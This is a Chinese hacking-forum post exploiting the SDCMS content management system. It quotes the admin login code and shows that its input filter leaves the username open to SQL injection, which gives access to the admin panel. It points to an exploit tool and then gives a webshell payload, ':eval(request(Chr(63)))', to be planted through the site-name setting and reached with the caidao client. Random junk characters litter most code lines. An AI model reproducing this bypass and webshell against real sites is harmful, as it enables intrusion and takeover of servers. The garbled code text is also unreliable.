作者:T00LS 鬼哥
. m5 }$ w. a) w漏洞文件:后台目录/index.asp
% L% |6 F' _( y7 `) O! [3 }9 S) s" R2 y4 V! k$ o( y* n
Sub Check
3 g! p# ` @- U Dim username,password,code,getcode,Rs. y" U5 ^, s) n$ v
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub, v# M1 |& ^7 _. }! O! t
username=FilterText(Trim(Request.Form("username")),1)
( S* m" w& o- q y0 ~" G0 `7 R8 x) P password=FilterText(Trim(Request.Form("password")),1)
! Q! G ]5 g2 P+ m- }0 {' v code=Trim(Request.Form("yzm"))
7 \" s8 g* o9 X0 N& h( C- E3 q getcode=Session("SDCMSCode")
/ H) T+ B; j" Z7 a8 ~+ W6 a4 | IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
% K, e' q* X* y1 L6 l E) Q IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)"ied
5 I- y3 N# Q ^ P- }3 t6 B- L- x IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied
: R5 y' P" @& c1 ]3 N/ c) s c1 m' Q IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied
/ e# Q& h6 \; u IF username="" or password="" Then* o( j9 y/ h9 l. T" l) L6 {# Y* f4 P
Echo "用户名或密码不能为空"ied
3 Q' v: |) c7 e6 { Else
/ K0 H- J8 l; }& d7 W Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
) e' R% y/ M" U/ v IF Rs.Eof Then
. p& o1 M7 U0 x$ H, }7 f0 d! O' ? AddLog username,GetIp,"登录失败",19 ?7 Z% | W5 n& M. p' f
Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
z! j- X+ O8 J$ _0 r. b Else- ~2 b: {) R3 l0 k0 U( \ `
Add_Cookies "sdcms_id",Rs(0)9 s3 H# p: n$ J; g
Add_Cookies "sdcms_name",username9 }& f. {8 e( M$ b2 W' l7 _
Add_Cookies "sdcms_pwd",Rs(2)5 p7 m* H, a- [/ e7 I0 [. o, E
Add_Cookies "sdcms_admin",Rs(3)
7 N1 Q: \" e6 O& m Add_Cookies "sdcms_alllever",Rs(4)5 S8 o3 L% ?# V: {
Add_Cookies "sdcms_infolever",Rs(5)1 X Y; h! C) v9 \4 `
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")0 T% S2 i+ f" n) T$ `5 W. B8 {/ r
AddLog username,GetIp,"登录成功",1
) p9 J, u: c6 l3 W '自动删除30天前的Log记录2 G- S. u, y2 x1 F) ]
IF Sdcms_DataType Then
) ]5 C5 `* S7 w3 R Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
% v5 C! j# c* o: m' v Else
9 F& q2 z) j2 J9 p+ h, s Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")$ |7 U9 ]3 B0 o% m/ @7 @0 S- l- @* E. X
End IF
! ^% D) A8 F- E Go("sdcms_index.asp")" i& f* \0 @$ d/ U& N
End IF* V1 z3 O4 o& R j8 O
Rs.Close
2 z' h! K. w; U0 X! | Set Rs=Nothing. i9 G5 e# r* d, J, A
End IF* i8 G2 @8 B+ b$ k( Y
End Sub- K& p, I0 p) D5 ~
) H+ t% o( ^5 u6 @3 ]; c- F
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
( O- i! C' C( i5 `- q$ M; a% d
) Z |. V0 M& J7 ]Function FilterText(ByVal t0,ByVal t1)+ z) @4 W2 O, S% ?& _+ a0 F1 c
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function A1 [; G! f0 s0 S' Z, t
t0=Trim(t0)
& @6 z7 x' V; A: C/ K$ e Select Case t1
% ]1 p1 `5 x! Y6 O& ^ I Case "1"; | [( m4 x/ z% h+ J% v. t% a
t0=Replace(t0,Chr(32),"")9 B# f9 E8 [* x$ w1 f
t0=Replace(t0,Chr(13),"")
$ C4 U0 e, J a3 `( p t0=Replace(t0,Chr(10)&Chr(10),"")
( p2 m. U; K+ Y# I; u t0=Replace(t0,Chr(10),"") C* @% `9 e* t: G
Case "2"; R9 n4 x% x& x
t0=Replace(t0,Chr(8),"")'回格% q% S$ E% x; [
t0=Replace(t0,Chr(9),"")'tab(水平制表符)
* R! o$ E9 A# ~1 ` t0=Replace(t0,Chr(10),"")'换行
! _, X- w+ F. H t0=Replace(t0,Chr(11),"")'tab(垂直制表符), [$ l- w. m: V- V8 C- h
t0=Replace(t0,Chr(12),"")'换页
4 [* \! `' j! H ]( T+ M0 P/ o t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合- {$ G# T+ } t' t1 h+ Z
t0=Replace(t0,Chr(22),"")
4 G: C# D+ q8 T) v. E# u t0=Replace(t0,Chr(32),"")'空格 SPACE
9 D" u0 |1 z4 u! K( ?$ ^ t0=Replace(t0,Chr(33),"")'!: B5 @4 J, p% Y) p
t0=Replace(t0,Chr(34),"")'"6 V& H; S! S) r6 \% u$ I3 l' K9 t
t0=Replace(t0,Chr(35),"")'#
, T0 m) |5 {( k4 F( t t0=Replace(t0,Chr(36),"")'$0 w2 \+ t( \) p! L2 [
t0=Replace(t0,Chr(37),"")'%
' L. q" f5 b5 E6 T3 P t0=Replace(t0,Chr(38),"")'&0 k+ T& K$ x1 a- D
t0=Replace(t0,Chr(39),"")''9 C. U4 q( s( S7 {+ N
t0=Replace(t0,Chr(40),"")'(
' N; z2 I2 U: C6 A t0=Replace(t0,Chr(41),"")')
C/ h, H* f0 W7 i t0=Replace(t0,Chr(42),"")'*
, ?* ?: }0 a& P" J) b t0=Replace(t0,Chr(43),"")'+
2 ]5 \' ?! O# { t0=Replace(t0,Chr(44),"")',
# q+ w7 t) n" V% D. ? t0=Replace(t0,Chr(45),"")'-: _" D% x# q- p7 [
t0=Replace(t0,Chr(46),"")'.6 z$ [, Z F- X, ]; V* \
t0=Replace(t0,Chr(47),"")'/5 x' `6 u# _/ T6 s% c$ t
t0=Replace(t0,Chr(58),"")': d F7 T9 X- F- @. D
t0=Replace(t0,Chr(59),"")';" K6 j+ Y' \5 f+ a- ]3 z
t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
! ]9 ~+ Q/ u3 K/ \+ A" u t0=Replace(t0,Chr(63),"")'?
1 D6 V& Y- h6 x t0=Replace(t0,Chr(64),"")'@
8 b2 S# l; A6 \6 R: u5 A+ E t0=Replace(t0,Chr(91),"")'\' K: }* \" _; R9 v6 y6 H
t0=Replace(t0,Chr(92),"")'\
, Y) V3 j5 {* S" y# b/ ~( ^' |5 V$ ]9 q t0=Replace(t0,Chr(93),"")'] y, X4 X9 s- ]8 ]+ P$ D
t0=Replace(t0,Chr(94),"")'^
0 r. {& Z0 s, k) f: u! y: k3 l t0=Replace(t0,Chr(95),"")'_
! ^$ V% i' K* Q, M) M" Q t0=Replace(t0,Chr(96),"")'`9 d& ?4 c4 k8 |" q
t0=Replace(t0,Chr(123),"")'{
4 w$ p0 g! \6 _& B$ N* v% ~) f t0=Replace(t0,Chr(124),"")'|6 Z4 z; R2 Q8 I1 t: Q- ~
t0=Replace(t0,Chr(125),"")'}# n% y9 B, H/ e! ]: J/ M+ z' E
t0=Replace(t0,Chr(126),"")'~
( \8 C1 a; p3 C" g! B& N) _6 T7 G Case Else
# I3 T# ^7 |. e: b3 e! ~ t0=Replace(t0, "&", "&")
) E/ c" N9 V3 W1 r7 Z' n5 S" R t0=Replace(t0, "'", "'")( g. \* d, }8 v" W9 ?
t0=Replace(t0, """", """)
/ t/ i3 B, a1 F) l! o8 @ t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
1 i' l- M- z6 c% L6 D End Select# i6 G1 R {* q) b: Y, R; @1 t
IF Instr(Lcase(t0),"expression")>0 Then
* N) c2 c6 v+ ~: \+ H( Z3 z t0=Replace(t0,"expression","e­xpression", 1, -1, 0)+ m* \# e# b1 V
End If
4 @) @, F9 J* p3 `% s) l FilterText=t0
5 [- j# W/ U; i2 Y: t: eEnd Function' e/ |: `% p+ o5 Y' D# z# T) V
- w8 N2 K+ ]7 D- y, d3 P8 c% P" S看到没。直接参数是1 只过滤& l( k( i3 Z/ g/ e1 K
t0=Replace(t0,Chr(32)," ")
' z/ p, ?( L) `4 {- G9 Y7 a3 l4 R t0=Replace(t0,Chr(13),"")
) g- | e; U" F# o/ f7 x t0=Replace(t0,Chr(10)&Chr(10),"3 r: g V( W. r7 `0 v
")
5 Q" f6 y: |! ~8 q1 M$ E t0=Replace(t0,Chr(10),"' x: B' l+ a" f& p l
")9 s/ i0 h0 _# m5 ^& Q9 q. q
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
, I' r& m9 z4 x) O0 cEXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP+ h5 ~3 \( a" p, Z; v) Y
' y0 K" ^4 ~3 C$ ~" d. @测试:3 z& E+ e2 X r; G! q, z$ w0 ~
6 r. g- w- F; M$ g
- d( H6 O' P1 {! [& D8 j现在输入工具上验证码,然后点OK
4 R E" a7 x1 _; V6 W. M, p- I
6 V& V+ V6 v$ I2 [% x! b: G! z) P
8 h, z$ g$ c+ p7 H5 T/ p看到我们直接进入后台管理界面了,呵呵!( ?1 ]# U7 u$ H' P R7 u( o1 B
/ D- q3 b" g1 S6 ~2 i
# S" y) [. L/ g% O# X
I/ Y0 w i, x( i) Z这样直接进入后台了。。。。
/ g- Y' d9 C7 K% i4 ]( t V- c
/ O. f% g, x% i( H7 l) m3 B+ Y
( c$ y7 M) Z3 N: r2 N" j" I& `3 ~
SDCMS提权:3 e1 q$ J, H/ }5 d" U1 R$ P
. P2 T4 x. R7 k
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?2 L' n' Z& Z2 f4 y9 Q7 }/ _
, z3 |, A- I8 U' D
7 {4 J, z, p+ H
# `1 f; ?8 m0 T7 C+ \( Q# U/ K" LOK,现在用菜刀连接下!
~0 Z+ V; f0 J" ]: P
* [ b. `. t2 C! j
" Y8 N9 T* ~5 `3 J/ ~/ @, M: R- o0 H9 p7 w3 I2 o
+ k2 R7 m# [. i d8 [
6 l2 S1 |( [! ~ j8 n
|